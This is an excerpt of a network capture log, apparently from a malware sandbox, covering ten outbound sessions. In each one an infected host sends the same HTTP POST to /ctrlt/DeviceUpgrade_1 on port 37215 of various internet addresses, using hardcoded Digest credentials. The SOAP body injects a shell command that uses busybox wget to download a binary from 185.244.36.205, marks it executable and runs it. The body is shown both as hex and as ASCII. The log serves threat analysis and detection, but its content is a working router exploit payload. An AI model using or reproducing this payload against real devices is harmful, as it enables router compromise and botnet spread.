                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              891192.168.2.153284641.110.35.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538870096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              892192.168.2.153725637.30.186.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538921118 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              893192.168.2.1534910122.191.103.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538944006 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              894192.168.2.1533066209.62.154.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538958073 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              895192.168.2.1535882197.170.101.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538976908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              896192.168.2.154071237.72.191.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538976908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              897192.168.2.156007045.150.84.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539000034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              898192.168.2.1560936181.208.30.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539031029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              899192.168.2.1533542186.147.243.17637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539031029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              900192.168.2.1553228138.7.251.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539060116 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
